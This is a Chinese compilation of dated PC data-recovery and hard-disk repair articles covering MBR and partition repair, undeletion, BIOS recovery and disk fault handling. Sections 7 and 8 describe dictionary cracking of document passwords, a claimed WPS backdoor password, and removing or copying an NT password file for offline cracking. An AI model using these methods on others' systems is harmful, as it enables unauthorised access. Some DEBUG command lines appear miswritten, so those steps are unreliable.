一般是虚拟内存不足造成的看C盘是否剩余空间过少， 或者打开的应用程序和窗口太多。

3、 全盘崩溃和分区丢失

首先重建MBR代码区，再根据情况修正分区表。修正分区表的基本思路是查找以55AA为结束的扇区，再根据扇区结构和后面是否有 FAT等情况判定是否为分区表，最后计算填回， 主分区表，由于需要计算，过程比较烦琐，就不仔细介绍了，希望大家用前面介绍的工具，比如NDD处理。如果文件仍然 无法读取，要考虑用TIRAMINT等工具进行修复。 如果在FAT表彻底崩溃的情况下，恢复某个指定文件，可以用DISKEDIT 或DEBUG查找已知信息。比如文件为文本，文件中包含 “软件狗”，那么我我们就要把他们转换为内码C8 ED BC FE B9 B7 进行查找。

4、 文件丢失、误格式化的情况

一般的来说，文件删除仅仅是把文件的首字节，改为E5H，而并不破坏本身，因此可以恢复。但由于对不连续文件要恢复文件链，由于手工交叉恢复对一般计算机用户来说并不容易，在这篇缩略版中就不讲了，建议用工具处理，如果已经安装了Norton Utilities，可以用他来查找。另外，RECOVERNT 等工具，都是恢复的利器。特别注意的是， 千万不要在发现文件丢失后，在本机安装什么恢复工具，你可能恰恰把文件覆盖掉了。特别是你的文件在C盘的情况下，如果你发现主要文件被你失手清掉了 ，（比如你按SHIFT删除），你应该马上直接关闭电源，用软盘 启动进行恢复或把硬盘串接到其他有恢复工具的机器处理。误格 式化的情况可以用等工具处理。

5、 文件损坏的情况

一般的说，恢复文件损坏需要清楚的了解文件的结构，并不是很容易的事情，而这方面的工具也不多。不过一般的说，文件如果字节正常，不能正常打开往往是文件头损坏。

就文件恢复举几个简单例子。
类型 特征 处理
 ZIP、TGZ等压缩包无法解压
ZIP文件损坏的情况下可以用一个名为ZIPFIX的工具处理。不过如果你的文件是从FTP站点上下载的，那么有可能是你没有定义下载模式为BIN。
 自解压文件无法解压
可能是可执行文件头损坏，可以用对应压缩工具按一般压缩文件解压。
 DBF文件死机后无法打开
典型的文件头中的记录数与实际不匹配了，把文件头中的记录数向下调整，遗憾的是公式我找不到了。

6、 硬盘被加密或变换：

此时千万不要FDISK/MBR，SYS等处理，否则可 能数据再也无法找回，一定要反解加密算法，或找到被移走的重要扇区。 对于那些加密硬盘数据的病毒，清除时一定要选择能恢复加密数据的可靠杀毒软件。

7、 文件加密后密码遗忘：

对于很多字处理软件的文件加密和ZIP等压缩包的加密，你是不能靠加密逆过程来完成的，因为那从理论上是异常困难的。

目前有一些相关的软件，他们的思想一般都是用一个大字典集中的数据循环用相同算法加密后与密码的密文匹配，直到一致时则说明找到了密码。你可以去寻找这些软件，当然，有些软件是有后门的，比如DOS下的WPS，Ctrl+qiubojun就是通用密码。Undiskp的作者冯志宏 是解文件密码的个中高手，大家不妨去他的主页看看。

8、 系统用户密码遗忘的处理：

最简单的方法就是用软盘启动（NT的你也可以把盘挂接在其他NT上），找到支持该文件系统结构的软件（比如针对 NT的NTFSDOS），利用他把密码文件清掉、或者是COPY出密码档案，用破解软件套字典来处理。前者时间短但所有用户信息丢失，后者时间长，但保全了所有用户信息。对UNIX系统，我建议你一定先做一张应急盘。


数据恢复简介

《一键清理系统垃圾》

数据恢复简介

本人一向认为单纯为了维修而维修的硬盘维修实在没有太大意义，除非是那些一门心思要当二手商人的批发和零售商（不过请不要受到我主观观念的影响，大家可以根据自己硬盘的用途，对是否值得维修独立作出判断）。毕竟，硬盘维修的“维修”跟普通意义上的维修是有很大区别的。如果我们坏了一块主板，经检查发现是一个三极管烧了，我们可以更换一个新的三极管，这样，这个三极管仍然可以实现原来三极管的功能，主板没有受任何影响，坏的地方也就不存在了，我们可以说——这块主板修好了。但是硬盘不一样，所谓的“维修”，只是把盘片上的坏道、硬盘内部的缺陷等等问题掩盖起来，不让硬盘的控制系统和计算机操作系统发觉而已，那些缺陷仍然实实在在地躺在硬盘里面，成为随时可以再爆发的定时炸弹。因此，单纯的维修，只能使硬盘暂时恢复可用性，我认为意义不大。而如果维修是为了让硬盘可以暂时使用，使用户可以重新读取盘里面的数据并备份到其他地方，那么这应该是值得的，毕竟用户的数据在一定程度上是无价的。（PS：比较讽刺的是，当一些二手商通过简单地隐藏分区来隐藏坏道的时候，不少硬盘维修商还振振有词地说那些人是利用了部分消费者的无知来坑人，是奸商；而他们才是真正的维修，所以他们的工作是如何复杂、技术要求如何高，他们人是如何正直等等。现在，我们发现原来他们也只不过是把缺陷藏起来而已，只不过藏得非常隐蔽，让人无从发现，不知道他们现在应该如何自处？还是说奸商如果能不让人发现，就可以摇身一变变得不奸了？我觉得至少那些隐藏分区的人还算比较正直，因为他们毕竟还为消费者保留了发现作假的权利^_^。

    在这方面，我接触过一个硬盘维修商，他是PC-3000在南方新增加的一个国内代理，这人算是比较坦白的，能够明确告诉客户硬盘修复后和原盘的差别，让客户自己决定是否维修。这在硬盘维修界中算是另类了。）数据恢复是一个比较敏感的话题，对于一些具体的理论、还原算法、涉及的仪器和具体操作的细节，都有各种各样的限制，不能详细作出描述。这里只能根据需要，尽量完整地让大家对数据恢复有一个大概的整体印象就已经足够了。数据恢复可以分为纯软件的恢复和软硬件结合的恢复。

    硬盘内部是有一定的校验公式来保障数据的完整性的，根据每一个扇区内数据的内容、扇区的伺服信息，再根据一定的校验公式经过运算，会产生一个唯一的校验和，这个值每一个扇区都是不一样的。同一个扇区储存不同数据的时候校验和固然不一样，不同的扇区储存相同的数据也会产生不一样的校验和（SCSI硬盘在这方面的机制会更加完善）。数据恢复正是利用了这样的原理，通过逆向运算，在某一方面的信息因为错误操作而丢失或者被改变的情况下，仍然可以根据其余的原始信息，把数据尽可能完整地还原出来。

    其实在实际操作中，删除文件、重新分区并快速格式化（Format不要加U参数）、快速低格、重整硬盘缺陷列表等等，都不会把数据从物理扇区中实际抹去。删除文件只是把文件的地址信息在列表中抹去，而文件的数据本身还是在原来的地方静静躺着，除非拷贝新的数据进去那些扇区，才会把原来的数据真正抹去。重新分区和快速格式化只不过是重新构造新的分区表和扇区信息，同样不会影响原来的数据在扇区中的物理存在，直到有新的数据去覆盖他们为止。快速低格一般只有原厂的DM才可以实现，是用DM软件快速重写盘面、磁头、柱面、扇区等等初始化信息，仍然不会把数据从原来的扇区中抹去。重整硬盘缺陷列表也只不过是把新的缺陷扇区加入到G列表或者P列表中去，对于那些本来储存在缺陷扇区中的数据那是没有办法了，因为扇区已经出现物理损坏，即使不加入缺陷列表，也很难恢复；但对于其他数据，其实还是没有实质性影响的。对这样的硬盘进行数据恢复，算是数据恢复里面比较简单的，最关键的一点是在错误操作出现后，不要再对硬盘作任何自己都不知道目的的无意义操作和不要再往硬盘里面写入任何东西。

    恢复这种硬盘的数据，可以通过纯粹的软件操作来完成。目前大家能够找到的数据恢复软件还是非常多的，大致有EasyRecovery、Recover、Lost&Found、FinalData、Disk Recover等等，还有其他很多，就不逐一列举了。这些软件有的在DOS模式下面运行，有的可以在Windows模式下面运行，甚至可以在NT/2000下面运行，处理NTFS格式分区里面丢失的数据。对于误删除、错误格式化，但又没有用其他数据覆盖这些形式的数据恢复，上面说的这些软件还是有相当好的效果的。当然，如果让一个菜鸟和一个老鸟来运用这些软件的话，恢复效果会有很大的差别。要提高数据恢复的成功率，关键是要掌握每一个软件的特性和每一个操作的参数和特点，有针对性地合理选择，配合使用，这是需要一定的经验积累才可以做到的。目前国内的数据恢复公司对这种级数的数据恢复报价是每个硬盘350～1000元人民币。

    纯粹软件的恢复当然有着极大的局限性，前提条件是必须要硬盘还能够正常使用才行。因此，对于一些有轻微缺陷的硬盘，稍微修理一下，让硬盘可以正常使用后，再进行软件的数据恢复是明智的，因为这样可以节省大量的数据恢复成本。毕竟，对于那些无论如何不能动的硬盘，软件是无能为力的，这时候就需要使用成本比较高的软硬件结合的恢复方式。

    采用软硬件结合的数据恢复方式，关键在于恢复用的仪器设备。这些设备都需要放置在超净无尘工作间里面，而且这些设备内部的工作台也是级别非常高的超净空间。这些设备的恢复原理也是大同小异，都是把硬盘拆开，把磁碟放进机器的超净工作台上，然后用激光束对盘片表面进行扫描，因为盘面上的磁信号其实是数字信号（0和1），所以相应地，反映到激光束发射的信号上也是不同的。这些仪器就是通过这样的扫描，一丝不漏地把整个硬盘的原始信号记录在仪器附带的电脑里面，然后再通过专门的软件分析来进行数据恢复。可以说，这种设备的数据恢复率是相当惊人的，即使是位于物理坏道上面的数据，由于多种信息的缺失而无法找出准确的数据值，也可以通过大量的运算，在多种可能的数据值之间进行逐一代入，结合其他相关扇区的数据信息，进行逻辑合理性校验，从而找出逻辑上最符合的真值。

    对于上面说到的设备和方式，目前国内拥有数据恢复设备，能够做到软硬结合的恢复方式的公司，根据资料显示目前暂时只有两家，分别位于北京和广东（资料有效期是今年4月，或许还有别的公司说自己有这样的设备，不过我觉得炒作的可能性比我漏查的可能性要大）。现在很多数据恢复公司都吹嘘说他们有多先进的设备，多高超的技术，但其实多半都是停留在纯软件级别的恢复而已。真的碰到难缠的盘，他们会快递到这两地的公司，让他们去用机器恢复，而这两家公司也认可这样的操作方式，因为这样他们就不需要花费打广告的钱，也保证了机器能够有足够的工作负荷，缩短投资回收期。这样级别的数据恢复，目前国内市场价格大约是每个硬盘3000～5000人民币甚至更多。当然，那两家公司接收从其他数据恢复公司转手过来的硬盘的时候，收的是行内批发价，这中间大概有数百到一千元左右的差价，当然是让那些数据恢复公司当仁不让当作中介费吃掉了。

    不过这仍旧不是数据恢复的终极方式。因为他们都有一个前提，就是数据没有被覆盖。对于已经被覆盖的数据、完全低格、全盘清零、强磁场破坏的硬盘，仍然有最终极的数据恢复方式，老美管这个叫“深层信号还原”。具体的原理比较复杂，但是可以通过一个相关的例子来说明。譬如一个人开车撞了人，跑掉了，为了逃避公安的侦查，他把汽车撞过凹陷的地方重新鼓起拉直，并喷上了新的油漆。那么，这样处理过的车子，在肉眼的观察下是看不出碰撞过的痕迹的。但是鉴证科的人只需要用弧光灯照射汽车，戴上专门的偏光镜去看，碰撞过的痕迹就马上一目了然。“深层信号还原”应用了与此类似的原理。从硬盘磁头的角度来看，同样的数据，拷贝进原来没有数据的新盘和拷贝进旧盘去覆盖掉原有数据，是没有分别的，因为这时候磁头所读取到的数字信号都是一样的。但是对于磁介质晶体来说，情况就有点不一样了，以前的数据虽然被覆盖了，但在介质的深层，仍然会留存着原有数据的“残影”，通过使用不同波长、不同强度的射线对这个晶体进行照射，可以产生不同的反射、折射和衍射信号，这就是说，用这些设备发出不同的射线去照射磁盘盘面，然后通过分析各种反射、折射和衍射信号，就可以帮助我们“看到”在不同深度下这个磁介质晶体的残影。根据目前的资料，大概可以观察到4～5层，也就是说，即使一个数据被不同的其他数据重复覆盖4次，仍然有被“深层信号还原”设备读出来的可能性。当然，这样的操作成本无疑是非常高的，也只能用在国家安全级别的用途上，目前世界范围内也没有几个国家可以拥有这样的技术，只有极少数规模庞大的计算机公司和不计成本的政府机关能拥有这样级别的数据恢复设备，而且主要都是由美国人掌握。

    看到这里，不知道我们的读者会有什么感想。在数据恢复领域，别人很早就已经能达到这样的技术高度了，而且现在，所有实质意义上的硬盘公司也全部都是别人的，但他们并没有大大咧咧到处炫耀。相反，我们国内的一些技术人员，数据恢复软件水平离日本还有十万八千里（被认为是“数据恢复软件之王”的FinalData是日本的产品），更不要说美国了；连属于自己的真正意义上的硬盘厂家都没有，算是小半桶水都不到了，但是摇晃起来倒是咣咣咣咣震天响。譬如某个南方的数据恢复公司设计了一个数据恢复软件（他们保密得很，我只看到了界面，没有真正看过工作方式和源码，不知道是不是“Banana软件”【注】，暂且算是他们设计的吧），10月23号的时候做了一次演示，把一个被PC-3000清空了缺陷列表的硬盘数据恢复出来，就认为效果很好了。可是，这本来就只是一个数据恢复软件应该做到的事情，国外的产品可以做到比这个更多，实在没有什么好炒作的。还有国内一个硬盘维修企业出了一个称为“国防版”的硬盘数据操作软件，但通过一些朋友在内部渠道了解过以后，不禁觉得有点失望——如果中国现在的国防级别软件也只能达到这个水平的话，未免太让人心灰意冷了吧。衷心希望这个“国防版”只是一句广告词而已。

【注】：Banana——香蕉。老美专指那些在美国出生的华裔，他们有中国人的黄皮肤，但是骨子里接受的却是美国白人的文化背景、生活方式和价值观念，因此用香蕉来比喻，取其“黄皮白心”之义。

    现在，有一些中国的软件公司，他们好一点的，购买外国软件的核心算法和引擎自己重新开发，但是付了2年的使用许可费，第3、4年照样使用；差一点的，反汇编出外国软件的算法、流程和指令，自己编写一个同类软件；或者再恶劣一点，只是对外国的软件进行脱壳，只是换上自己写的一个中文界面，就堂而皇之地拿出来卖，美其名曰“民族软件”。对于这些软件，国外程序员比较无奈地，其中比较有幽默感的人就把这些软件统称“Banana软件”。这类软件在国内是令人难以置信地超大量存在，无论出品自大公司小公司，你叫得出名字叫不出名字，几乎毫无例外地有着“香蕉”的影子。


软件修复文件 拯救光盘中的数据

《一键清理系统垃圾》

软件修复文件 拯救光盘中的数据

目前市场上销售的刻录盘质量都不太好，虽然刻录后的文件可以在资源管理器中看见，但就是不能读取，而且光盘放久也可能出现整张盘不能读取的现象，这可怎么办呢？其实可以试试用BadCopy来进行修复。

    下载地址：http://www.huajun.net/soft/5701.htm

    部分数据无法读取

    首先在软件界面左侧的“Recovery Source”中选择“CD-ROM”，然后在右侧选择光驱驱动器，在“Recovery　Mode”中选择“Rescue Corrupted Files”，完成后点击“Next”。

    进入待修复文件的文件夹，选中需要修复的文件，点击“Next”开始修复。文件修复后，点击“Browse”按钮来选择修复后文件的保存路径，最后点击“Next”即可完成。

    数据完全无法读出

    对于一些连文件都读不出来的光盘，我们也可以使用这个软件来进行修复，首先在软件界面左侧的“Recovery Source”中选择“CD-ROM”，然后在右侧选择光驱驱动器，在“Recovery Mode”中选择“Rescue lost Files-Mode #1”就可以了。

    “Mode#1”和“Mode#2”的区别在于使用不同的算法和磁盘访问方式，最大限度地恢复光盘的数据，可以先尝试用“Mode#1”进行修复，如果效果不理想，可以再尝试“Mode#2”进行修复。

    进入“Mode#1”后先点击上面的“Scan Disc”按钮来扫描光盘中的数据，然后选择“Track No”，然后选择需要恢复的文件，选好后点击下面的“Recover”按钮，程序就开始进行恢复了，恢复好后选择一个文件夹保存就行了(如图2)。如果有些文件扫描不到，你还可以试试在“Mode#2”下进行数据恢复。

    为了减少刻录盘出现这些麻烦，最好在刻录完光盘后用软件来检测一下，检查光盘的数据是否完整、是否有损毁，如果数据有损怀，还可以及时重新刻录，当然最重要就是购买刻录盘时不要太贪便宜哦。

    光盘检测软件CDCheck下载地址：http://www.skycn.com/soft/6768.html


BOIS类数据恢复

《一键清理系统垃圾》

BOIS类数据恢复

BOIS是基本输入/输出系统的缩写。BOIS是系统内附的，在电脑没有访问磁盘上程序之前决定机器基本功能的软件系统。就PC而言，BOIS包含了控制键盘，显示屏幕，磁盘驱动器，串行通讯设备和很多其他功能的代码。 一般地，BOIS存储在主板上的ROM芯片（所以通常叫ROM BOIS），确保了BOIS的一般可用性和不会因为磁盘错误而损坏。它也确保了机器能够启动。因为RAM比ROM的速度快，很多的机器制造商设计的BOIS在机器启动时能从ROM被拷贝到RAM去运行，这项技术也叫shadowing。当今，在很多Pc里是flash BOIS，以为着这BOIS是存储在可重新改写的flash内存芯片，如果需要的话改写毫不费力。但如果是损坏了呢？如何恢复损坏的BOIS？割据笔者多次的恢复经验，提出以下方案供参考。

一．利用根区BOIS（Boot—block BOIS） 当今大多数基于AWARD

BOIS的主板里都有根区BOIS，这是个在升级BOIS时会不会被覆盖的一小部分BOIS。它只支持很基本的硬件如：软盘等。如果您的显卡是PCI的，在BOIS被损坏后您的屏幕将是漆黑一片，因为根区BOIS只支持ISA的显卡。根区BOIS可以执行可引导软盘上的AUTOEXEC.BAT。这样我们可以把Award flasher和正确的BOIS文件（*.bin）放在软盘上并在AUTOEXEC.BAT里加入BOIS升级命令。

二．得到新的BOIS芯片

1．联系主板生产商，看是否他们能提供BOIS芯片。有些生产商是免费提供的。

2．联系卖相关芯片的电脑公司，如Unicore Software ( http ://www.unicore.com/ )或Midco Computers（以前的RC Systema公司，http : //www.midcocomputers.com/ ）。下面是Midco的一段广告：“我们向公众提供BOIS的更换芯片。请访问www.midcomputers.com ，我们将乐意帮助您。”

三．热交换

注意：此方法风险较大，请小心使用（使用者风险自负）。

用另外一块可以正常使用的BOIS芯片来更换当前损坏的芯片，而正常BOIS芯片的主板必须尽量和损坏的一致。在正常芯片的机器上先把“System BOIS cache able”设为ENABLE，进入DOS后，把正常的芯片拔掉，用损害的芯片来替代，然后正确地升级BOIS即可。

注意：建议使用MRBOIS的读写程序他们的产品名声最好。可以访问ftp://ftp.mrbioa.com找相关软件。

四．适用于Intel主板的方法

把Flash Recovery的跳线放在recovery mode的位置，把可启动的BOIS升级软盘放入，启动机器。

因为没被覆盖的根区BOIS不支持PCI的显卡这时屏幕上什么都没有。可以通过鸣笛声和软盘LED来观察。当机器响了一下，接着软盘的LED亮时，系统就正在升级BOIS。当软盘的LED灯灭时，说明恢复已完成，关机。把跳线恢复到缺省位置，重启动继续恢复。

除了以上方法外，还可以用我们比较熟悉的Debug来恢复BOIS的出厂值，方法如下：

1．针对AMI/Award BOIS:

C:\DEBUG（在纯DOS下，不是Windows里的DOS窗口）

-0 70 17 -0 71 17 Q 2．

针对Phoenix BOIS

C:/DEBUG（在纯DOS下，不是Windows里的DOS窗口）

-0 70 FF -0 71 17 Q
      精彩推荐


硬盘软硬故障之维护

《一键清理系统垃圾》

硬盘软硬故障之维护

随着技术的进一步提高，电脑配件的价格不断下跌，硬盘也在容量和稳定性大幅度提高的同时，价格频频跳水。目前，我们购买一台普通兼容机，花在硬盘上资金比例并不高，但是硬盘在电脑中充当数据载体，数据本身却是无法用价值来估量的。硬盘属于高速运行的机械部件，其使用频率十分高，因此，硬盘是电脑中故障率比较高的配件。我们买得起硬盘，也要有效地保障硬盘中的数据安全，普通硬盘故障的处理很自然成为DIY用户必须具备的能力。

    硬盘和其他配件不同，出现故障的情况比较复杂，所以，我们有必要先了解一下硬盘的构成以及基本工作原理。

上图中暗红的是就是一个磁道（track），黄色的是扇区（sector）
    我们知道，硬盘是一种磁介质的外部存储设备，在其盘片的每一面上，以转动轴为轴心、以一定的磁密度为间隔的若干同心圆就被划分成磁道(Track)，每个磁道又被划分为若干个扇区(Sector)，数据就按扇区存放在硬盘上。硬盘的第一个扇区(0道0头1扇区)被保留为主引导扇区。主引导扇区内主要有两项内容：主引导记录(对操作系统进行引导)和硬盘分区表。计算机启动时将读取该扇区的数据，并对其合法性进行判断(扇区最后两个字节是否为55AA或AA55)，如合法则跳转执行该扇区的第一条指令。所以硬盘的主引导区常常成为病毒攻击的对象，从而被篡改甚至被破坏。

    而硬盘的工作原理是利用特定的磁粒子的极性来记录数据。当磁头在读取数据时，将磁粒子的不同极性转换成不同的电脉冲信号，再利用数据转换器将这些原始信号变成电脑可以使用的数据，写的操作正好与此相反。另外，硬盘中还有一个存储缓冲区，这是为了协调硬盘与主机在数据处理速度上的差异而设置的。

    硬盘故障总的来说可以分为两大类：软故障和硬故障。

    所谓的软故障，大多数是由于人为原因引起的。最常见的有：与硬盘连接的线路有误、cmos有错误、还有分区表错误和比较难缠的“逻辑锁”问题。

    一、与硬盘连接的线路错误

    线路松动致使电脑自检无法检测到硬盘或者无法启动硬盘，是最简单最常见的问题，此问题不管是菜鸟或者大虾们也无法避免的，解决问题笔者我就不再陈述，大家只要拨拨线头就行了，举手之劳而已。

因为现在硬盘比较便宜，所以很多朋友会买给自己的爱机加装个硬盘。但是当两个硬盘连接在同一个IDE口的时候机器却无法进入系统，此时应该首先考虑到自从跳线的问题。把两个硬盘一个设置为主盘、一个设置为从盘，而主从跳线的连接电路在每个硬盘上都会有标识的。
    二、CMOS错误

    我们知道，主板的cmos是存储电脑硬件最基本信息的地方。其亦包括存储硬盘的类型、容量、柱面数、磁头数、每道扇区数、寻址方式等信息，对硬盘参数加以说明，以便计算机正确访问硬盘。

所以，当CMOS因故掉电或发生错误时（启动时一般会提示“CMOS Checksum Error”或类似信息），硬盘设置可能会丢失或错误，硬盘访问也就无法正确进行。这种情况我们就必须重新设置硬盘参数，在BIOS使用“自动检测硬盘类型”（HD Type Auto Detection）的功能，一般也就可以解决问题了。

    此外，在BIOS里设置时，硬盘模式设为默认的“LBA”，因为如果设置为其他的模式，在读写硬盘时会出现错误，甚至会导致硬盘数据丢失，而引起不必要的损失。

    有很多使用win98的朋友，在新加了个硬盘后系统却无法启动，而换下新的硬盘就一切正常。其问题在于两个硬盘存在多分区的情况下，然而win98系统盘却并非是C盘，而是其他盘（例如D、E、F...），这样就致使盘符交错，导致win98在启动时找不到安装时默认的相关系统文件及众多应用程序，造成无法正常启动。解决的办法有两个：如果你只使用win98的话，比较简单，在CMOS中将第二硬盘设为NONE即可，但在纯DOS下不认第二个硬盘。第二种方法是接上双硬盘后，给第二个硬盘重新分区，删掉其主DOS分区，只分扩展分区。

    三、分区表错误

    分区表错误属于严重的硬盘错误，其主要是人为误操作或者病毒破坏做成的。我们要清楚的认识到，当分区表错误，甚至通过系统启动盘也无法正常识别硬盘的时候，大家不要束手无策，分区格式的话固然能够解决问题，不过我们宝贵的资料也会随之灰飞烟灭。所以我们应该要冷静对待，寻求最好的办法。

    对于分区表故障急救的方法，我们要首先查杀病毒。借助KV3000、瑞星、金山等杀毒软件提供的引导软盘启动计算机，接着在DOS环境中对系统进行病毒查杀操作。一般来说，将引导区中残留的病毒清除之后即可恢复计算机的正常使用。

    病毒查杀完成的话，我们用用Fdisk命令修复。我们知道Fdisk不仅是一个分区程序，它还有着非常便捷的恢复主引导扇区功能，而且它只修改主引导扇区，对其他扇区并不进行写操作，因此对于那些还在使用Windows 9x的朋友而言无疑是个非常理想的分区表修复工具。通过Fdisk修复主引导区的时候，先用Windows 98启动盘启动系统，在提示符下输入“Fdisk /mbr”命令即可覆盖主引导区记录。

    当分区表错误，甚至通过系统启动盘也无法正常识别硬盘的时候，大家不要束手无策。分区格式的话固然能够解决问题，不过我们宝贵的资料也会随之灰飞烟灭。我们应该要冷静对待，寻求最好的方法。

    三、逻辑锁

    被“逻辑锁”锁住硬盘亦是严重的硬盘故障。所谓的硬盘逻辑锁，全是被DOS的低级失误所赐。在DOS系统启动时，它会搜索所有逻辑盘的顺序。首先要找的是主引导扇区的分区表信息，它位于硬盘的零头零柱面的第一个扇区的OBEH地址开始的地方，当分区信息开始的地方为80H时表示是主引导分区，其他的为扩展分区，主引导分区被定义为逻辑盘C盘，然后查找扩展分区的逻辑盘，被定义为D盘，以此类推找到E，F，G……逻辑锁就是在此下手，修改了正常的主引导分区记录将扩展分区的第一个逻辑盘指向自己，DOS在启动时查找到第一个逻辑盘后，查找下个逻辑盘时，总是找到自己，这样一来就形成了死循环，致使软驱,光驱，双硬盘都不能正常启动。

    无独有偶，就在笔者写好这篇文章的前几天，和我同宿舍的一个同学遇上了这个难缠的“逻辑锁”。当时，笔者因为怕麻烦就用“热拔插”硬盘电源的方法来处理：当系统启动时，先别给被锁的硬盘插上电源线，等待启动完成后再给硬盘“热插”上电源线，这时如果硬盘没有烧坏的话，系统就可以控制硬盘了。不过，这是个十分危险的办法，笔者事后也暗自庆幸硬盘没被我这样弄烧，不然我这个月就要吃素了......这里，笔者不推荐大家轻易尝试。下面笔者介绍一种比较简单的解决方法。

    首先我们进入BIOS将所有的硬盘都设定NONE，这样，可以用其他的设备来引导机器。我们知道DM软件是不依赖于主板BIOS的硬盘识别安装软件，即使BIOS不认硬盘。把DM拷到一张系统盘上，启动后运行DM，你会发现DM可以绕过BIOS，识别出硬盘，选中该硬盘，分区格式化就可以了。虽然这种方法很简单，不过其唯一的缺点就是硬盘上的数据将全部丢失。
所谓的硬故障即硬盘物理性故障，是由于硬盘的机械零件或电子元器件物理性损坏而引起。硬盘常见的硬故障是出现坏道，其中最为严重的特例表现为零磁道损坏。

    我们知道硬盘的坏道又分为逻辑坏道和物理坏道。硬盘的逻辑坏道为逻辑性故障，通常为软件操作或使用不当造成的，可利用软件或者直接高格即可修复；硬盘的物理坏道为物理性故障，表明您的硬盘磁道产生了物理损伤，是无法用软件或者高格来修复的，只能通过更改或隐藏硬盘扇区来解决。逻辑坏道对硬盘影响不大，对做好备份者而言，最多就只是重装系统而已。而物理坏道则不同，是具有“传染性”的，一旦发现物理坏道就表示你硬盘有严重质量问题或者硬盘寿命快到了，应赶紧做好备份工作，以避免宝贵资料的损失。

    说是这么说，不过硬盘坏道是电脑的隐性故障，很难直观判断。其实，我们在运行程序或者复制文件的时候，经常出现错误又或者一个文件读取很长时间，而且在硬盘运行的时候有些不正常的噪音，发现这样情况的我们应该留个心眼，准备做好硬盘备份工作。当我们format（高格）硬盘时候，停止不前然后报错无法完成，对硬盘执行FDISK时候无法进行顺利，这样我们确定硬盘出现坏道。

    对于硬盘出现的物理坏道，怕于其具有“传染性”，所以我们要将其单独分为一个区并隐藏起来，让磁头不再去读它，这样可在一定程度上令您的硬盘延长使用寿命。首先，用PartitionMagic、DiskManager等磁盘软件扫描磁盘，计算出坏簇在硬盘上的位置，然后将其全部格式化，在“操作”菜单下选择“高级/坏扇区重新测试”，把坏簇所在硬盘分成多个区后，再利用“操作”菜单下选择“高级/隐藏分区”把坏簇所在的分区隐藏。

    硬盘的零磁道损坏，是十分严重的硬盘故障，一般要修复是不大可能，其直接宣布了硬盘的报废。不过对于硬盘0扇区损坏的情况，虽然比较棘手，但也不是无可救药的。基本思路是合理运用一些磁盘软件，把损坏的0扇区屏蔽掉，而用1扇区来取代，这样的话就有可能将其复活。

    试试使用PCTOOLS 9.0中的DE。运行DE打开Select菜单，这时会出现Partition Table，选中并进入，之后出现硬盘分区表信息. l分区就是C盘，该分区是从硬盘的0柱面开始的，那么，将1分区的Beginning Cylinder的0改成1就可以了。保存后退出。 重新启动，按Delete键进入回COMS设置，进行“IDE AUTO DETECT”， 最后保存退出，重新分区格式化即可能修复。

    不单是PCTOOLS，使用诺顿NU工具亦可以。进入NU 8.0工具包目录，运行其主程序NORTON.EXE，接着选择“磁盘编辑器Diskedit”，成功运行后选“对象Object”，选“分区表”后将硬盘的起始扇区从0面0柱1扇区改为0面1柱1扇区，然后保存退出，格式化硬盘即可正常使用了。

    如果以上方法都不能对硬盘进行修复的话，我们就要考虑“低格”了。所谓“低格”是指对一块裸盘进行划分磁道和扇区、标注地址信息、设置交叉因子、修复逻辑坏道等低层操作。而“高格”是将做清除硬盘上的数据，生成BOOT区信息，初始化FAT表，标注逻辑坏道等工作。

    对于有坏道的硬盘，“低格”是没办法中的办法，“穷途末路”时候才用的。其对硬盘有害无益，加速硬盘的磨损不止，还会令坏道蔓延的更快，加快硬盘的死亡。若实在需要进行低格，应尽量采用厂家专用的低格程序。另外“低格”的过程进行得很慢，若中途出现掉电死机等意外情况，将会造成非常严重的后果。

    以上是笔者对硬盘故障与修复作出的一个总结，希望笔者愚昧之见能够帮助大家好好的保护自己珍贵的资料以及硬盘，避免可挽回的损失。


拿什么来拯救你之硬盘数据抢救经验谈

《一键清理系统垃圾》

拿什么来拯救你之硬盘数据抢救经验谈

由于技术的成熟以及生产成本的下降，硬盘的价格和它的容量成反比的一路狂降，现在一般普通用户的硬盘动辄120G或160G，一些喜欢下载东东的玩家更是用到了三四百个Gb的硬盘了。大容量以及高转速的硬盘给用户带来更多的存储空间，同时呢，它也带来更多的不稳定性，经常会无缘无故的数据丢失进不了系统，更甚是整个硬盘GAME OVER。不少用户在抱怨，怎么就以前那些小硬盘反而不会经常出状况呢？

    其实，这些问题的产生不仅和硬盘的质量有关，而且和我们用户使用硬盘的习惯也有很大关系。硬盘作为电子产品，出现数据丢失等现象是比较常见的，因此，作为用户我们要养成务份重要数据的良好习惯，同时掌握一些解决常见的数据丢失故障的技巧，这样才能在必要的时候及时抢救出你硬盘里的数据，把硬盘损坏带来的损害降到最低。

一、未雨绸缪，谈新硬盘的分区

    拿到一块新的硬盘，要做的第一件事当然就是分区了。这一步骤的重要性很容易被用户忽略，一般用户都会很随意地安排硬盘的分区。其实，硬盘分区是否合理直接影响到以后工作的便利性和数据的安全性。

1.硬盘分区基本知识

    讲到硬盘分区，就得为大家介绍一下分区的基本知识了。一般在完成硬盘分区之后，会形成3种形式的分区状态；即主分区、扩展分区和逻辑分区。

    主分区是一个比较单纯的分区，通常位于硬盘的最前面一块区域中，构成逻辑C磁盘。其中的主引导程序是它的一部分，此段程序主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软区或光区之后可对硬盘进行读写。

    扩展分区和逻辑分区的概念比较复杂，可能会造成硬盘分区与逻辑磁盘混淆；分区表的第四个字节为分区类型值，正常的可引导的大于32mb的基本DOS分区值为06，扩展的DOS分区值是05。如果把基本DOS分区类型改为05则无法启动系统，并且不能读写其中的数据。分区表中还有其他数据用于纪录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，一般无法进行手工恢复，唯一的方法是用备份的分区表数据重新写回，或者从其他的相同类型的并且分区状况相同的硬盘上获取分区表数据。

    由于微机操作系统仅仅为分区表保留了64个字节的存储空间，而每个分区的参数占据16个字节，所以操作系统只允许存储4个分区的数据，实际使用中4个逻辑磁盘往往不能满足需求；我们常说的硬盘扩展分区，它只是一个指向下一个分区的指针，这种指针结构将形成一个单向链表。所以一旦单向链表发生问题，将会导致磁盘的丢失。如果对这个概念仍是搞不清楚，那就直接记住一个简单原则好了：只有在建立了扩展分区的基础上才能建立逻辑分区，而扩展分区的损坏直接导致逻辑分区丢失。

2.硬盘分区推荐工具

    目前用于硬盘分区的软件非常多，像FDISK、NORTONDISKDOCTOR和PQMagic等等，用户可以根据自己的喜好进行选择。在这里，笔者向大家推荐这款国产硬盘分区工具DiskMan，它的功能比较强，而且是全中文界面，非常适合国人使用。

3.硬盘分区小技巧

